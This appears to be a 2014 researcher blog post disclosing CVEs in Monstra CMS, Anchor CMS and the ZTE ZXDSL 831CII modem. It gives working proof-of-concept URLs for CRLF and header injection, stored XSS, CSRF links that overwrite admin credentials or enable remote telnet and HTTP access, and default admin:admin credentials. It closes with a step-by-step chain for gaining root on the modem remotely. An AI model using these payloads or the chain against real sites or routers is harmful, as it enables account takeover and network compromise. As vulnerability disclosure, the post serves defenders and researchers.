November 2014

(Monstra <= 3.0.1 & Anchor <= 0.9) CVE-2014-9006, CVE-2014-9182

2:07 AM

Monstra CMS 3.0.1 (current version at the time of writing) and below Vulnerabilities

`HTTP Response Splitting (CRLF Injection)`

`http://packetstormsecurity.com/files/129043/Monstra-3.0.1-HTTP-Response-Splitting.html`

/plugins/captcha/crypt/cryptographp.php

<?php

...
SetCookie("cryptcookietest", "1");
Header("Location:
cryptographp.inc.php?cfg=".$_GET['cfg']."&sn=".session_name()."&".SID);
... ?>


So providing 

http://[host]/[loc]/plugins/captcha/crypt/cryptographp.php?cfg=%0A%0DContent-T
ype:%20text/html%0A%0D%0A%0D%3Cscript%3Ealert%281%29%3C/script%3E&

Using %0A%0D%0A%0D will allow you to add headers. this can be used to cause

reflective XSS, Content-Spoofing, Open Redirection, and many more.



Would result a CRLF injection.

Note: PHP version must allow multiple headers. this is fixed >5.6.2

`Bruteforce Mitigation Bypass [CVE-2014-9006]`

`http://packetstormsecurity.com/files/129082/Monstra-3.0.1-Bruteforce-Mitigation-Bypass.html`

admin/index.php

:33-42

// Admin login
if (Request::post('login_submit')) {

    if (Cookie::get('login_attempts') && Cookie::get('login_attempts') >= 5) {

        $login_error = __('You are banned for 10 minutes. Try again
later', 'users');

    } else {

        $user = $users->select("[login='" .
trim(Request::post('login')) . "']", null);
}

The code blocks bruteforce attempts simply by placing a cookie called

"login_attempts" in the victims browser an attacker can craft a bruteforce script

that either clears cookies or does not send cookies at all.

Anchor CMS <= 0.9.2 Header Injection [CVE-2014-9182]

Anchor CMS versions 0.9.2 and below suffer from a header injection vulnerability.

Anchor CMS <= 0.9.2 (Current Version)

header injection

in anchor/models/comment.php

<?php

...

$headers = 'MIME-Version: 1.0' . "\r\n";

$headers .= 'Content-type: text/html; charset=utf-8' . "\r\n";

$headers .= 'From: notifications@' . $_SERVER['HTTP_HOST'] . "\r\n";

49: mail($to, __('comments.notify_subject'), $message, $headers);

... ?>

so it is possible to inject arbitary "From" headers or any header

using CRLF. simply by tampering and changing the host to bad.com or

bad.com\r\nNew-Header:Hacked!

http://1337day.com/exploit/22851

cve

ZTE ZXDSL 831C|| Multiple Vulnerabilities

2:11 PM

ZTE 831CII suffers from login bypass, cross site request forgery, hardcoded administrative credential, and cross site scripting vulnerabilities.

Hardcoded administrative credential

In ZTE routers the username is a constant which is “admin” and the password by default is “admin”

Insecure Direct Object Reference [CVE-2014-9184]

ZTE ZXDSL 831CII suffers from an insecure direct object reference vulnerability that allows for authentication bypass.

The modem usually serves html files & protects them with HTTP Basic authentication. however, the cgi files, does not get this protection. so simply requesting any cgi file (without no authentication) would give a remote attacker full access to the modem and then can easily be used to root the modem and disrupt network activities.

So requesting gateway (in this case, 192.168.1.1) would result HTTP Authentication request, but simply requesting http://192.168.1.1/main.cgi will bypass it.

PoC:

http://192.168.1.1/adminpasswd.cgi (will result admin password change page) - viewing the source will show the current password (unencrypted)

The page does not contain current password, also have no ani-CSRF token. wtf!

http://192.168.1.1/userpasswd.cgi

http://192.168.1.1/upload.cgi

http://192.168.1.1/conprocess.cgi

http://192.168.1.1/connect.cgi

Persistent XSS [CVE-2014-9020]

http://192.168.1.1/psilan.cgi?action=save&ethIpAddress=192.168.1.1&ethSubnetMask=255.255.255.0&hostname=ZXDSL83C1II&domainname=home%27;alert%280%29;//&enblUpnp=1&enblLan2=0

Any user browsing to http://192.168.1.1/main.html will have a stored xss executed!

XSS'es [CVE-2014-9021]

TR-069 Client page: Stored. executes when users go to http://192.168.1.1/tr69cfg.html

http://192.168.1.1/tr69cfg.cgi?tr69cInformEnable=1&tr69cInformInterval=43200&tr69cAcsURL=http://acs.etc.et:9090/web/tr069%27;alert%280%29;//&tr69cAcsUser=cpe&tr69cAcsPwd=cpe&tr69cConnReqUser=itms&tr69cConnReqPwd=itms&tr69cNoneConnReqAuth=0&tr69cDebugEnable=0

http://192.168.1.1/tr69cfg.cgi?tr69cInformEnable=1&tr69cInformInterval=43200&tr69cAcsURL=http://acs.site.et:9090/web/tr069&tr69cAcsUser=cpe%27;alert%280%29;//&tr69cAcsPwd=cpe&tr69cConnReqUser=itms&tr69cConnReqPwd=itms&tr69cNoneConnReqAuth=0&tr69cDebugEnable=0

http://192.168.1.1/tr69cfg.cgi?tr69cInformEnable=1&tr69cInformInterval=43200&tr69cAcsURL=http://acs.site.et:9090/web/tr069&tr69cAcsUser=cpe&tr69cAcsPwd=cpe%27;alert%280%29;//&tr69cConnReqUser=itms&tr69cConnReqPwd=itms&tr69cNoneConnReqAuth=0&tr69cDebugEnable=0

http://192.168.1.1/tr69cfg.cgi?tr69cInformEnable=1&tr69cInformInterval=43200&tr69cAcsURL=http://acs.site.et:9090/web/tr069&tr69cAcsUser=cpe&tr69cAcsPwd=cpe&tr69cConnReqUser=itms&tr69cConnReqPwd=itms%27;alert%280%29;//&tr69cNoneConnReqAuth=0&tr69cDebugEnable=0%27;alert%280%29;//

Time and date page (/sntpcfg.sntp) - Persistent

http://192.168.1.1/sntpcfg.sntp?ntp_enabled=0&tmYear=2000%27lol&tmMonth=01&tmDay=01&tmHour=00&tmMinute=30&timezone_offset=+08:00&timezone=Beijing,%20Chongqing,%20Hong%20Kong,%20Urumqi%22;alert%280%29;//&use_dst=0&enblLightSaving=0

Quick Stats page:

192.168.1.1/psilan.cgi?action=save&ethIpAddress=192.168.1.1&ethSubnetMask=255.255.255.0&hostname=ZXDSL83C1II';alert(0);//&domainname=home&enblUpnp=1&enblLan2=0

http://192.168.1.1/psilan.cgi?action=save&ethIpAddress=192.168.1.1&ethSubnetMask=255.255.255.0&hostname=ZXDSL83C1II&domainname=home%27;alert%280%29;//&enblUpnp=1&enblLan2=0

CSRF based Stored XSS

http://192.168.1.1/adminpasswd.cgi?action=save&sysUserName=%27;alert%280%29;//&sysPassword=37F6E6F627B6 - letting an admin visit this link would result the admin username changed to ';alert(0);// also a stored XSS in the home page.

Admin account override CSRF [CVE-2014-9019]

There is no token/capcha or even current password prompt when the admin changes the password, and credentials are sent over GET.

PoC: http://192.168.1.1/adminpasswd.cgi?action=save&sysUserName=admin&sysPassword=F6C656269697

If an authenticated admin browses that link their credentials will become admin:yibelo

UI Redressing

The modem (like most modems) does not have a clickjacking protection. thus, can be used to modify settings, override admin accounts by a simple clickjack. forexample by using http://192.168.1.1/adminpasswd.html it is possible into tricking an admin submit a form with our credintials (since it doesn't require current password)

Not Using SSL

The modem does not use HTTPS, so anyone can use MiTM to sniff ongoing actions, possibly gain user credentials.

Unrestricted privileges

Anyone who is connected to the modem with Telnet or tftp is root. simply telneting and authenticating as admin:admin and typing sh and echo $USER would prove that.

Enable Remote Access CSRF [CVE-2014-9027]

Using this an attacker can trick an admin visit a page that tricks them into enabling remote access to the modem out side of the LAN.

so an attacker can attack the modem out side the lan; then an attacker can use this to escilate the attack.

Enable Access from web browser :80

http://192.168.1.1/accessremote.cmd?remoteservice=pppoe_8_81&enblicmp=0&enblftp=0&ftpport=21&enblhttp=1&httpport=80&enblsnmp=0&snmpport=161&enbltelnet=0&telnetport=23&enbltftp=0&tftpport=69&enblssh=0&sshport=22

Enable Access from Telnet :23

http://192.168.1.1/accessremote.cmd?remoteservice=pppoe_8_81&enblicmp=0&enblftp=0&ftpport=21&enblhttp=0&httpport=80&enblsnmp=0&snmpport=161&enbltelnet=1&telnetport=23&enbltftp=0&tftpport=69&enblssh=0&sshport=22

Enable Access from TFTP :69

http://192.168.1.1/accessremote.cmd?remoteservice=pppoe_8_81&enblicmp=0&enblftp=0&ftpport=21&enblhttp=0&httpport=80&enblsnmp=0&snmpport=161&enbltelnet=0&telnetport=23&enbltftp=1&tftpport=69&enblssh=0&sshport=22

Enable Remote Access from all {80,69,161,23}

http://192.168.1.1/accessremote.cmd?remoteservice=pppoe_8_81&enblicmp=1&enblftp=1&ftpport=21&enblhttp=1&httpport=80&enblsnmp=1&snmpport=161&enbltelnet=1&telnetport=23&enbltftp=0&tftpport=69&enblssh=0&sshport=22

and what a fucked up modem I have :'( Good thing I am root.

Exploitation

from all those exploits, its easy to construct a remote root command execution exploit against any of these modems.

1. Make a logged in admin enable remote access for us with
http://192.168.1.1/accessremote.cmd?remoteservice=pppoe_8_81&enblicmp=1&enblftp=1&ftpport=21&enblhttp=1&httpport=80&enblsnmp=1&snmpport=161&enbltelnet=1&telnetport=23&enbltftp=0&tftpport=69&enblssh=0&sshport=22 (Only if we are outside LAN)

2. Go to http://192.168.1.1/adminpasswd.cgi and change admin password or copy the current one (recommended)

3. telnet to 192.168.1.1 with the admin password and username (most likely admin:admin) and what do you know,

4. type sh then echo $USER and become the root of the network.

5. RULE'em ALL!

http://packetstormsecurity.com/files/129015/ZTE-ZXDSL-831CII-Insecure-Direct-Object-Reference.html

http://packetstormsecurity.com/files/129017/ZTE-ZXDSL-831-Cross-Site-Scripting.html

http://packetstormsecurity.com/files/129016/ZTE-831CII-Hardcoded-Credential-XSS-CSRF.html

Happy Hacking! :D